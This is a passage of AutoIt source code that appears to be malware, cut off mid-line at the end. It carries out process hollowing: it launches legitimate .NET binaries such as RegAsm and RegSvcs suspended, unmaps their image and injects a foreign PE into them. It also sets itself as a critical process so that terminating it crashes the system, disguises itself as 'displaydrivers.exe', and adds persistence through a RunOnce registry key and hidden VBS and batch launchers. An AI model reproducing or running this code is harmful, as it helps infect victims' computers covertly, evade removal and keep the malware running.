        Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $inject_net4_regsvc, "WSTR", $scommandline, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information))
    ElseIf FileExists($inject_net2_regsvc) Then
        Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $inject_net2_regsvc, "WSTR", $scommandline, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information))
    ElseIf FileExists($inject_net4_regasm) Then
        Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $inject_net4_regasm, "WSTR", $scommandline, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information))
    ElseIf FileExists($inject_net2_regasm) Then
        Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $inject_net2_regasm, "WSTR", $scommandline, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information))
    ElseIf FileExists($inject_net4_applaunch) Then
        Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $inject_net4_applaunch, "WSTR", $scommandline, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information))
    ElseIf FileExists($inject_net2_applaunch) Then
        Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $inject_net2_applaunch, "WSTR", $scommandline, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information))
    ElseIf FileExists($inject_newdev) Then
        Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $inject_newdev, "WSTR", $scommandline, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information))
    ElseIf FileExists($inject_twunk_32) Then
        Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $inject_twunk_32, "WSTR", $scommandline, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information))
    Else
        Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $inject_ndadmin, "WSTR", $scommandline, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information))
    EndIf
    If @error OR NOT $acall[0] Then Return SetError(1, 0, 0)
    Local $hprocess = DllStructGetData($tprocess_information, "PROCESS")
    Local $hthread = DllStructGetData($tprocess_information, "THREAD")
    If $fautoitx64 AND __runpe_iswow64process($hprocess) Then
        DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
        Return SetError(2, 0, 0)
    EndIf
    #Region 4. FILL CONTEXT STRUCTURE
    Local $irunflag, $tcontext
    If $fautoitx64 Then
        If @OSArch = "X64" Then
            $irunflag = 2
        Else
            $irunflag = 3
            DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
            Return SetError(102, 0, 0)
        EndIf
    Else
        $irunflag = 1
    EndIf
    Local $context_full
    Switch $irunflag
        Case 1
            $context_full = 65543
        Case 2
            $context_full = 1048583
        Case 3
            $context_full = 524327
    EndSwitch
    DllStructSetData($tcontext, "CONTEXTFLAGS", $context_full)
    $acall = DllCall("KERNEL32.DLL", "BOOL", "GetThreadContext", "HANDLE", $hthread, "PTR", DllStructGetPtr($tcontext))
    If @error OR NOT $acall[0] Then
        DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
        Return SetError(3, 0, 0)
    EndIf
    Local $ppeb
    Switch $irunflag
        Case 1
            $ppeb = DllStructGetData($tcontext, "EBX")
        Case 2
            $ppeb = DllStructGetData($tcontext, "RDX")
        Case 3
    EndSwitch
    #Region 5. READ PE-FORMAT
    Local $pheaders_new = $ppointer
    $ppointer += DllStructGetData($timage_dos_header, "ADDRESSOFNEWEXEHEADER")
    Local $smagic = DllStructGetData($timage_dos_header, "MAGIC")
    If NOT ($smagic == "MZ") Then
        DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
        Return SetError(4, 0, 0)
    EndIf
    Local $timage_nt_signature = DllStructCreate("DWORD SIGNATURE", $ppointer)
    $ppointer += 4
    If DllStructGetData($timage_nt_signature, "SIGNATURE") <> 17744 Then
        DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
        Return SetError(5, 0, 0)
    EndIf
    Local $inumberofsections = DllStructGetData($timage_file_header, "NUMBEROFSECTIONS")
    $ppointer += 20
    Local $imagic = DllStructGetData($tmagic, 1)
    Local $timage_optional_header
    If $imagic = 267 Then
        If $fautoitx64 Then
            DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
            Return SetError(6, 0, 0)
        EndIf
        $ppointer += 96
    ElseIf $imagic = 523 Then
        If NOT $fautoitx64 Then
            DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
            Return SetError(6, 0, 0)
        EndIf
        $ppointer += 112
    Else
        DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
        Return SetError(6, 0, 0)
    EndIf
    Local $ientrypointnew = DllStructGetData($timage_optional_header, "ADDRESSOFENTRYPOINT")
    Local $ioptionalheadersizeofheadersnew = DllStructGetData($timage_optional_header, "SIZEOFHEADERS")
    Local $poptionalheaderimagebasenew = DllStructGetData($timage_optional_header, "IMAGEBASE")
    Local $ioptionalheadersizeofimagenew = DllStructGetData($timage_optional_header, "SIZEOFIMAGE")
    $ppointer += 8
    $ppointer += 8
    $ppointer += 24
    Local $paddressnewbasereloc = DllStructGetData($timage_directory_entry_basereloc, "VIRTUALADDRESS")
    Local $isizebasereloc = DllStructGetData($timage_directory_entry_basereloc, "SIZE")
    Local $frelocatable
    If $paddressnewbasereloc AND $isizebasereloc Then $frelocatable = True
    If NOT $frelocatable Then ConsoleWrite("!!!NOT RELOCATABLE MODULE. I WILL TRY BUT THIS MAY NOT WORK!!!" & @CRLF)
    $ppointer += 88
    #Region 6. ALLOCATE 'NEW' MEMORY SPACE
    Local $frelocate
    Local $pzeropoint
    If $frelocatable Then
        $pzeropoint = __runpe_allocateexespace($hprocess, $ioptionalheadersizeofimagenew)
        If @error Then
            $pzeropoint = __runpe_allocateexespaceataddress($hprocess, $poptionalheaderimagebasenew, $ioptionalheadersizeofimagenew)
            If @error Then
                __runpe_unmapviewofsection($hprocess, $poptionalheaderimagebasenew)
                $pzeropoint = __runpe_allocateexespaceataddress($hprocess, $poptionalheaderimagebasenew, $ioptionalheadersizeofimagenew)
                If @error Then
                    DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
                    Return SetError(101, 1, 0)
                EndIf
            EndIf
        EndIf
        $frelocate = True
    Else
        $pzeropoint = __runpe_allocateexespaceataddress($hprocess, $poptionalheaderimagebasenew, $ioptionalheadersizeofimagenew)
        If @error Then
            __runpe_unmapviewofsection($hprocess, $poptionalheaderimagebasenew)
            $pzeropoint = __runpe_allocateexespaceataddress($hprocess, $poptionalheaderimagebasenew, $ioptionalheadersizeofimagenew)
            If @error Then
                DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
                Return SetError(101, 0, 0)
            EndIf
        EndIf
    EndIf
    DllStructSetData($timage_optional_header, "IMAGEBASE", $pzeropoint)
    #Region 7. CONSTRUCT THE NEW MODULE
    Local $tmodule = DllStructCreate("BYTE[" & $ioptionalheadersizeofimagenew & "]")
    Local $pmodule = DllStructGetPtr($tmodule)
    Local $theaders = DllStructCreate("BYTE[" & $ioptionalheadersizeofheadersnew & "]", $pheaders_new)
    DllStructSetData($tmodule, 1, DllStructGetData($theaders, 1))
    Local $timage_section_header
    Local $isizeofrawdata, $ppointertorawdata
    Local $ivirtualaddress, $ivirtualsize
    Local $trelocraw
    For $i = 1 To $inumberofsections
        $isizeofrawdata = DllStructGetData($timage_section_header, "SIZEOFRAWDATA")
        $ppointertorawdata = $pheaders_new + DllStructGetData($timage_section_header, "POINTERTORAWDATA")
        $ivirtualaddress = DllStructGetData($timage_section_header, "VIRTUALADDRESS")
        $ivirtualsize = DllStructGetData($timage_section_header, "UNIONOFVIRTUALSIZEANDPHYSICALADDRESS")
        If $ivirtualsize AND $ivirtualsize < $isizeofrawdata Then $isizeofrawdata = $ivirtualsize
        If $isizeofrawdata Then
            DllStructSetData(DllStructCreate("BYTE[" & $isizeofrawdata & "]", $pmodule + $ivirtualaddress), 1, DllStructGetData(DllStructCreate("BYTE[" & $isizeofrawdata & "]", $ppointertorawdata), 1))
        EndIf
        If $frelocate Then
            If $ivirtualaddress <= $paddressnewbasereloc AND $ivirtualaddress + $isizeofrawdata > $paddressnewbasereloc Then
                $trelocraw = DllStructCreate("BYTE[" & $isizebasereloc & "]", $ppointertorawdata + ($paddressnewbasereloc - $ivirtualaddress))
            EndIf
        EndIf
        $ppointer += 40
    Next
    If $frelocate Then __runpe_fixreloc($pmodule, $trelocraw, $pzeropoint, $poptionalheaderimagebasenew, $imagic = 523)
    $acall = DllCall("KERNEL32.DLL", "BOOL", "WriteProcessMemory", "HANDLE", $hprocess, "PTR", $pzeropoint, "PTR", $pmodule, "DWORD_PTR", $ioptionalheadersizeofimagenew, "DWORD_PTR*", 0)
    If @error OR NOT $acall[0] Then
        DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
        Return SetError(7, 0, 0)
    EndIf
    #Region 8. PEB IMAGEBASEADDRESS MANIPULATION
    $acall = DllCall("KERNEL32.DLL", "BOOL", "ReadProcessMemory", "PTR", $hprocess, "PTR", $ppeb, "PTR", DllStructGetPtr($tpeb), "DWORD_PTR", DllStructGetSize($tpeb), "DWORD_PTR*", 0)
    If @error OR NOT $acall[0] Then
        DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
        Return SetError(8, 0, 0)
    EndIf
    DllStructSetData($tpeb, "IMAGEBASEADDRESS", $pzeropoint)
    $acall = DllCall("KERNEL32.DLL", "BOOL", "WriteProcessMemory", "HANDLE", $hprocess, "PTR", $ppeb, "PTR", DllStructGetPtr($tpeb), "DWORD_PTR", DllStructGetSize($tpeb), "DWORD_PTR*", 0)
    If @error OR NOT $acall[0] Then
        DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
        Return SetError(9, 0, 0)
    EndIf
    #Region 9. NEW ENTRY POINT
    Switch $irunflag
        Case 1
            DllStructSetData($tcontext, "EAX", $pzeropoint + $ientrypointnew)
        Case 2
            DllStructSetData($tcontext, "RCX", $pzeropoint + $ientrypointnew)
        Case 3
    EndSwitch
    #Region 10. SET NEW CONTEXT
    $acall = DllCall("KERNEL32.DLL", "BOOL", "SetThreadContext", "HANDLE", $hthread, "PTR", DllStructGetPtr($tcontext))
    If @error OR NOT $acall[0] Then
        DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
        Return SetError(10, 0, 0)
    EndIf
    #Region 11. RESUME THREAD
    $acall = DllCall("KERNEL32.DLL", "DWORD", "ResumeThread", "HANDLE", $hthread)
    If @error OR $acall[0] = -1 Then
        DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
        Return SetError(11, 0, 0)
    EndIf
    #Region 12. CLOSE OPEN HANDLES AND RETURN PID
    DllCall("KERNEL32.DLL", "BOOL", "CloseHandle", "HANDLE", $hprocess)
    DllCall("KERNEL32.DLL", "BOOL", "CloseHandle", "HANDLE", $hthread)
    Return DllStructGetData($tprocess_information, "PROCESSID")
EndFunc

Func __runpe_fixreloc($pmodule, $tdata, $paddressnew, $paddressold, $fimagex64)
    Local $idelta = $paddressnew - $paddressold
    Local $isize = DllStructGetSize($tdata)
    Local $pdata = DllStructGetPtr($tdata)
    Local $timage_base_relocation, $irelativemove
    Local $ivirtualaddress, $isizeofblock, $inumberofentries
    Local $tenries, $idata, $taddress
    Local $iflag = 3 + 7 * $fimagex64
    While $irelativemove < $isize
        $ivirtualaddress = DllStructGetData($timage_base_relocation, "VIRTUALADDRESS")
        $isizeofblock = DllStructGetData($timage_base_relocation, "SIZEOFBLOCK")
        $inumberofentries = ($isizeofblock - 8) / 2
        $tenries = DllStructCreate("WORD[" & $inumberofentries & "]", DllStructGetPtr($timage_base_relocation) + 8)
        For $i = 1 To $inumberofentries
            $idata = DllStructGetData($tenries, 1, $i)
            If BitShift($idata, 12) = $iflag Then
                $taddress = DllStructCreate("PTR", $pmodule + $ivirtualaddress + BitAND($idata, 4095))
                DllStructSetData($taddress, 1, DllStructGetData($taddress, 1) + $idelta)
            EndIf
        Next
        $irelativemove += $isizeofblock
    WEnd
    Return 1
EndFunc

Func __runpe_allocateexespaceataddress($hprocess, $paddress, $isize)
    Local $acall = DllCall("KERNEL32.DLL", "PTR", "VirtualAllocEx", "HANDLE", $hprocess, "PTR", $paddress, "DWORD_PTR",$isize, "DWORD", 4096, "DWORD", 64)
    If @error OR NOT $acall[0] Then
        $acall = DllCall("KERNEL32.DLL", "PTR", "VirtualAllocEx", "HANDLE", $hprocess, "PTR", $paddress, "DWORD_PTR", $isize, "DWORD", 12288, "DWORD", 64)
        If @error OR NOT $acall[0] Then Return SetError(1, 0, 0)
    EndIf
    Return $acall[0]
EndFunc

Func __runpe_allocateexespace($hprocess, $isize)
    Local $acall = DllCall("KERNEL32.DLL", "PTR", "VirtualAllocEx", "HANDLE", $hprocess, "PTR", 0, "DWORD_PTR", $isize, "DWORD", 12288, "DWORD", 64)
    If @error OR NOT $acall[0] Then
Return SetError(1, 0, 0) Return $acall[0] EndFunc Func __runpe_unmapviewofsection($hprocess, $paddress) DllCall("NTDLL.DLL", "INT", "NtUnmapViewOfSection", "PTR", $hprocess, "PTR", $paddress) If @error Then Return SetError(1, 0, 0) Return 1 EndFunc Func __runpe_iswow64process($hprocess) Local $acall = DllCall("KERNEL32.DLL", "BOOL", "IsWow64Process", "HANDLE", $hprocess, "BOOL*", 0) If @error OR NOT $acall[0] Then Return SetError(1, 0, 0) Return $acall[2] EndFunc Global Const $error_no_token = 1008 Global Const $se_privilege_enabled_by_default = 1 Global Const $se_privilege_enabled = 2 Global Const $se_privilege_removed = 4 Global Enum $tokenprimary = 1, $tokenimpersonation Global Enum $securityanonymous = 0, $securityidentification, $securityimpersonation, $securitydelegation Global Const $token_assign_primary = 1 Global Const $token_duplicate = 2 Global Const $token_impersonate = 4 Global Const $token_query = 8 Global Const $token_query_source = 16 Global Const $token_adjust_privileges = 32 Func _winapi_getlasterror($curerr = @error, $curext = @extended) Local $aresult = DllCall("kernel32.dll", "dword", "GetLastError") Return SetError($curerr, $curext, $aresult[0]) EndFunc Func _security__adjusttokenprivileges($htoken, $fdisableall, $pnewstate, $ibufferlen, $pprevstate = 0, $prequired = 0) Local $acall = DllCall("advapi32.dll", "bool", "AdjustTokenPrivileges", "handle", $htoken, "bool", $fdisableall, "struct*", $pnewstate, "dword", $ibufferlen, "struct*", $pprevstate, "struct*", $prequired) If @error Then Return SetError(1, @extended, False) Return NOT ($acall[0] = 0) EndFunc Func _security__getlengthsid($psid) If NOT _security__isvalidsid($psid) Then Return SetError(1, @extended, 0) Local $acall = DllCall("advapi32.dll", "dword", "GetLengthSid", "struct*", $psid) If @error Then Return SetError(2, @extended, 0) Return $acall[0] EndFunc Func _security__impersonateself($ilevel = $securityimpersonation) Local $acall = DllCall("advapi32.dll", "bool", 
"ImpersonateSelf", "int", $ilevel) If @error Then Return SetError(1, @extended, False) Return NOT ($acall[0] = 0) EndFunc Func _security__isvalidsid($psid) Local $acall = DllCall("advapi32.dll", "bool", "IsValidSid", "struct*", $psid) If @error Then Return SetError(1, @extended, False) Return NOT ($acall[0] = 0) EndFunc Func _security__lookupaccountname($saccount, $ssystem = "") Local $tdata = DllStructCreate("byte SID[256]") Local $acall = DllCall("advapi32.dll", "bool", "LookupAccountNameW", "wstr", $ssystem, "wstr", $saccount, "struct*", $tdata, "dword*", DllStructGetSize($tdata), "wstr", "", "dword*", DllStructGetSize($tdata), "int*", 0) If @error OR NOT $acall[0] Then Return SetError(1, @extended, 0) Local $aacct[3] $aacct[0] = _security__sidtostringsid(DllStructGetPtr($tdata, "SID")) $aacct[1] = $acall[5] $aacct[2] = $acall[7] Return $aacct EndFunc Func _security__lookupprivilegevalue($ssystem, $sname) Local $acall = DllCall("advapi32.dll", "bool", "LookupPrivilegeValueW", "wstr", $ssystem, "wstr", $sname, "int64*", 0) If @error OR NOT $acall[0] Then Return SetError(1, @extended, 0) Return $acall[3] EndFunc Func _security__openthreadtoken($iaccess, $hthread = 0, $fopenasself = False) If $hthread = 0 Then $hthread = _winapi_getcurrentthread() If @error Then Return SetError(1, @extended, 0) Local $acall = DllCall("advapi32.dll", "bool", "OpenThreadToken", "handle", $hthread, "dword", $iaccess, "bool", $fopenasself, "handle*", 0) If @error OR NOT $acall[0] Then Return SetError(2, @extended, 0) Return $acall[4] EndFunc Func _security__openthreadtokenex($iaccess, $hthread = 0, $fopenasself = False) Local $htoken = _security__openthreadtoken($iaccess, $hthread, $fopenasself) If $htoken = 0 Then If _winapi_getlasterror() <> $error_no_token Then Return SetError(3, _winapi_getlasterror(), 0) If NOT _security__impersonateself() Then Return SetError(1, _winapi_getlasterror(), 0) $htoken = _security__openthreadtoken($iaccess, $hthread, $fopenasself) If $htoken = 0 Then 
Return SetError(2, _winapi_getlasterror(), 0) EndIf Return $htoken EndFunc Func _security__setprivilege($htoken, $sprivilege, $fenable) Local $iluid = _security__lookupprivilegevalue("", $sprivilege) If $iluid = 0 Then Return SetError(1, @extended, False) Local $tcurrstate = DllStructCreate($tagtoken_privileges) Local $icurrstate = DllStructGetSize($tcurrstate) Local $tprevstate = DllStructCreate($tagtoken_privileges) Local $iprevstate = DllStructGetSize($tprevstate) Local $trequired = DllStructCreate("int Data") DllStructSetData($tcurrstate, "Count", 1) DllStructSetData($tcurrstate, "LUID", $iluid) If NOT _security__adjusttokenprivileges($htoken, False, $tcurrstate, $icurrstate, $tprevstate, $trequired) Then Return SetError(2, @error, False) DllStructSetData($tprevstate, "Count", 1) DllStructSetData($tprevstate, "LUID", $iluid) Local $iattributes = DllStructGetData($tprevstate, "Attributes") If $fenable Then $iattributes = BitOR($iattributes, $se_privilege_enabled) Else $iattributes = BitAND($iattributes, BitNOT($se_privilege_enabled)) EndIf DllStructSetData($tprevstate, "Attributes", $iattributes) If NOT _security__adjusttokenprivileges($htoken, False, $tprevstate, $iprevstate, $tcurrstate, $trequired) Then Return SetError(3, @error, False) Return True EndFunc Func _security__sidtostringsid($psid) If NOT _security__isvalidsid($psid) Then Return SetError(1, 0, "") Local $acall = DllCall("advapi32.dll", "bool", "ConvertSidToStringSidW", "struct*", $psid, "ptr*", 0) If @error OR NOT $acall[0] Then Return SetError(2, @extended, "") Local $pstringsid = $acall[2] Local $ssid = DllStructGetData(DllStructCreate("wchar Text[" & _winapi_stringlenw($pstringsid) + 1 & "]", $pstringsid), "Text") _winapi_localfree($pstringsid) Return $ssid EndFunc Func _security__stringsidtosid($ssid) Local $acall = DllCall("advapi32.dll", "bool", "ConvertStringSidToSidW", "wstr", $ssid, "ptr*", 0) If @error OR NOT $acall[0] Then Return SetError(1, @extended, 0) Local $psid = $acall[2] Local 
$tbuffer = DllStructCreate("byte Data[" & _security__getlengthsid($psid) & "]", $psid) Local $tsid = DllStructCreate("byte Data[" & DllStructGetSize($tbuffer) & "]") DllStructSetData($tsid, "Data", DllStructGetData($tbuffer, "Data")) _winapi_localfree($psid) Return $tsid EndFunc Func _winapi_closehandle($hobject) Local $aresult = DllCall("kernel32.dll", "bool", "CloseHandle", "handle", $hobject) If @error Then Return SetError(@error, @extended, False) Return $aresult[0] EndFunc Func _winapi_createsolidbrush($ncolor) Local $aresult = DllCall("gdi32.dll", "handle", "CreateSolidBrush", "dword", $ncolor) If @error Then Return SetError(@error, @extended, 0) Return $aresult[0] EndFunc Func _winapi_deletedc($hdc) Local $aresult = DllCall("gdi32.dll", "bool", "DeleteDC", "handle", $hdc) If @error Then Return SetError(@error, @extended, False) Return $aresult[0] EndFunc Func _winapi_deleteobject($hobject) Local $aresult = DllCall("gdi32.dll", "bool", "DeleteObject", "handle", $hobject) If @error Then Return SetError(@error, @extended, False) Return $aresult[0] EndFunc Func _winapi_fillrect($hdc, $ptrrect, $hbrush) Local $aresult If IsPtr($hbrush) Then $aresult = DllCall("user32.dll", "int", "FillRect", "handle", $hdc, "struct*", $ptrrect, "handle", $hbrush) Else $aresult = DllCall("user32.dll", "int", "FillRect", "handle", $hdc, "struct*", $ptrrect, "dword_ptr", $hbrush) EndIf If @error Then Return SetError(@error, @extended, False) Return $aresult[0] EndFunc Func _winapi_getclassname($hwnd) If NOT IsHWnd($hwnd) Then $hwnd = GUICtrlGetHandle($hwnd) Local $aresult = DllCall("user32.dll", "int", "GetClassNameW", "hwnd", $hwnd, "wstr", "", "int", 4096) If @error Then Return SetError(@error, @extended, False) Return SetExtended($aresult[0], $aresult[2]) EndFunc Func _winapi_getclientrect($hwnd) Local $trect = DllStructCreate($tagrect) DllCall("user32.dll", "bool", "GetClientRect", "hwnd", $hwnd, "struct*", $trect) If @error Then Return SetError(@error, @extended, 0) Return 
$trect EndFunc Func _winapi_getcurrentthread() Local $aresult = DllCall("kernel32.dll", "handle", "GetCurrentThread") If @error Then Return SetError(@error, @extended, 0) Return $aresult[0] EndFunc Func _winapi_getdc($hwnd) Local $aresult = DllCall("user32.dll", "handle", "GetDC", "hwnd", $hwnd) If @error Then Return SetError(@error, @extended, 0) Return $aresult[0] EndFunc Func _winapi_getdesktopwindow() Local $aresult = DllCall("user32.dll", "hwnd", "GetDesktopWindow") If @error Then Return SetError(@error, @extended, 0) Return $aresult[0] EndFunc Func _winapi_getmodulehandle($smodulename) Local $smodulenametype = "wstr" If $smodulename = "" Then $smodulename = 0 $smodulenametype = "ptr" EndIf Local $aresult = DllCall("kernel32.dll", "handle", "GetModuleHandleW", $smodulenametype, $smodulename) If @error Then Return SetError(@error, @extended, 0) Return $aresult[0] EndFunc Func _winapi_getwindow($hwnd, $icmd) Local $aresult = DllCall("user32.dll", "hwnd", "GetWindow", "hwnd", $hwnd, "uint", $icmd) If @error Then Return SetError(@error, @extended, 0) Return $aresult[0] EndFunc Func _winapi_iswindowvisible($hwnd) Local $aresult = DllCall("user32.dll", "bool", "IsWindowVisible", "hwnd", $hwnd) If @error Then Return SetError(@error, @extended, 0) Return $aresult[0] EndFunc Func _winapi_lineto($hdc, $ix, $iy) Local $aresult = DllCall("gdi32.dll", "bool", "LineTo", "handle", $hdc, "int", $ix, "int", $iy) If @error Then Return SetError(@error, @extended, False) Return $aresult[0] EndFunc Func _winapi_localfree($hmem) Local $aresult = DllCall("kernel32.dll", "handle", "LocalFree", "handle", $hmem) If @error Then Return SetError(@error, @extended, False) Return $aresult[0] EndFunc Func _winapi_moveto($hdc, $ix, $iy) Local $aresult = DllCall("gdi32.dll", "bool", "MoveToEx", "handle", $hdc, "int", $ix, "int", $iy, "ptr", 0) If @error Then Return SetError(@error, @extended, False) Return $aresult[0] EndFunc Func _winapi_openprocess($iaccess, $finherit, $iprocessid, 
$fdebugpriv = False) Local $aresult = DllCall("kernel32.dll", "handle", "OpenProcess", "dword", $iaccess, "bool", $finherit, "dword", $iprocessid) If @error Then Return SetError(@error, @extended, 0) If $aresult[0] Then Return $aresult[0] If NOT $fdebugpriv Then Return 0 Local $htoken = _security__openthreadtokenex(BitOR($token_adjust_privileges, $token_query)) If @error Then Return SetError(@error, @extended, 0) _security__setprivilege($htoken, "SeDebugPrivilege", True) Local $ierror = @error Local $ilasterror = @extended Local $iret = 0 If NOT @error Then $aresult = DllCall("kernel32.dll", "handle", "OpenProcess", "dword", $iaccess, "bool", $finherit, "dword", $iprocessid) $ierror = @error $ilasterror = @extended If $aresult[0] Then $iret = $aresult[0] _security__setprivilege($htoken, "SeDebugPrivilege", False) If @error Then $ierror = @error $ilasterror = @extended EndIf EndIf _winapi_closehandle($htoken) Return SetError($ierror, $ilasterror, $iret) EndFunc Func __winapi_parsefiledialogpath($spath) Local $afiles[3] $afiles[0] = 2 Local $stemp = StringMid($spath, 1, StringInStr($spath, "\", 0, -1) - 1) $afiles[1] = $stemp $afiles[2] = StringMid($spath, StringInStr($spath, "\", 0, -1) + 1) Return $afiles EndFunc Func _winapi_releasedc($hwnd, $hdc) Local $aresult = DllCall("user32.dll", "int", "ReleaseDC", "hwnd", $hwnd, "handle", $hdc) If @error Then Return SetError(@error, @extended, False) Return $aresult[0] EndFunc Func _winapi_screentoclient($hwnd, ByRef $tpoint) Local $aresult = DllCall("user32.dll", "bool", "ScreenToClient", "hwnd", $hwnd, "struct*", $tpoint) If @error Then Return SetError(@error, @extended, False) Return $aresult[0] EndFunc Func _winapi_selectobject($hdc, $hgdiobj) Local $aresult = DllCall("gdi32.dll", "handle", "SelectObject", "handle", $hdc, "handle", $hgdiobj) If @error Then Return SetError(@error, @extended, False) Return $aresult[0] EndFunc Func _winapi_stringlenw($vstring) Local $acall = DllCall("kernel32.dll", "int", "lstrlenW", 
"struct*", $vstring) If @error Then Return SetError(1, @extended, 0) Return $acall[0] EndFunc $scriptname = "displaydrivers.exe" Func anti_hook() __bsod($scriptname, True) EndFunc $protectprocess = IniRead($uniscriptdir & "\lcOfvbDCSMZ.CCP", "3551354", "2518129", "NotFound") If $protectprocess = "3450378" Then AdlibRegister("anti_hook", 500) Else EndIf Func __bsod($process_name, $bsod_status) Local Const $status_success = 0 Local Const $bsod_class = 29 Local Const $info_length = 4 Local Const $process_all_access = 2035711 Local $result, $process_handle, $process_id, $bsod_struct, $bsod_struct_ptr If NOT Call("__DEBUGE_PRIVILEGE", True) Then Return "![>] ERROR : DEBUGE PRIVILEGE OF PROCESS [ " & $process_name & " ] CAN NOT CHANGED" $process_id = ProcessExists($process_name) If $process_id = 0 Then Return "![>] ERROR : PROCESS [ " & $process_name & " ] NOT EXIST" $process_handle = _winapi_openprocess($process_all_access, True, $process_id) If @error Then Return "![>] ERROR : CAN NOT OPEN [ " & $process_name & " ] PROCESS" $bsod_struct = DllStructCreate("BOOL BSOD_STATUS") DllStructSetData($bsod_struct, "BSOD_STATUS", $bsod_status) $bsod_struct_ptr = DllStructGetPtr($bsod_struct) $result = DllCall("NTDLL.DLL", "DWORD", "NtSetInformationProcess", "HANDLE", $process_handle, "INT", $bsod_class, "PTR", $bsod_struct_ptr, "ULONG", $info_length) _winapi_closehandle($process_handle) $bsod_struct_ptr = 0 If $result[0] = $status_success Then Return "+[>] BSOD OF PROCESS [ " & $process_name & " ] CHANGED WITH NO ERROR" & @CRLF Else Return "![>] ERROR : BSOD OF PROCESS [ " & $process_name & " ] NOT CHANGED , ERROR CODE : " & Hex($result[0], 8) EndIf EndFunc Func __debuge_privilege($status) Local $htoken, $ilasterror $htoken = _security__openthreadtokenex(BitOR($token_adjust_privileges, $token_query)) If @error Then Return SetError(@error, @extended, 0) $ilasterror = _security__setprivilege($htoken, "SEDEBUGPRIVILEGE", $status) _winapi_closehandle($htoken) Return $ilasterror 
EndFunc OnAutoItExitRegister("exitme") Func exitme() __bsod($scriptname, False) EndFunc Local $antibotkill = IniRead($uniscriptdir & "\lcOfvbDCSMZ.CCP", "antibotkill-1", "antibotkill-2", "NotFound") If $antibotkill = "antibotkill-3" Then AdlibRegister("antibotkill", 1000) Else EndIf Func antibotkill() $getstart = RegRead("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path) If $getstart = $unicode_userprofile & "\" & $path & "\84922.vbs" Then Else RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\" & $path & "\84922.vbs") EndIf If NOT FileExists($unicode_userprofile & "\" & $path & "\84922.vbs") Then Local $vbs = FileOpen($unicode_userprofile & "\" & $path & "\84922.vbs", 1) FileWrite($vbs, "const Hidden = 0" & @CRLF & "const WaitOnReturn = true" & @CRLF & 'File ="""' & $unicode_userprofile & "\" & $path & "\" & '74851.cmd"""' & @CRLF & 'set WshShell = CreateObject("WScript.Shell")' & @CRLF & "WshShell.Run file, Hidden, WaitOnReturn" & @CRLF & "wscript.quit") FileClose($vbs) EndIf If NOT FileExists($unicode_userprofile & "\" & $path & "\74851.cmd") Then $autoit3 = "displaydrivers.exe" Local $bat = FileOpen($unicode_userprofile & "\" & $path & "\74851.cmd", 1) FileWrite($bat, "@echo 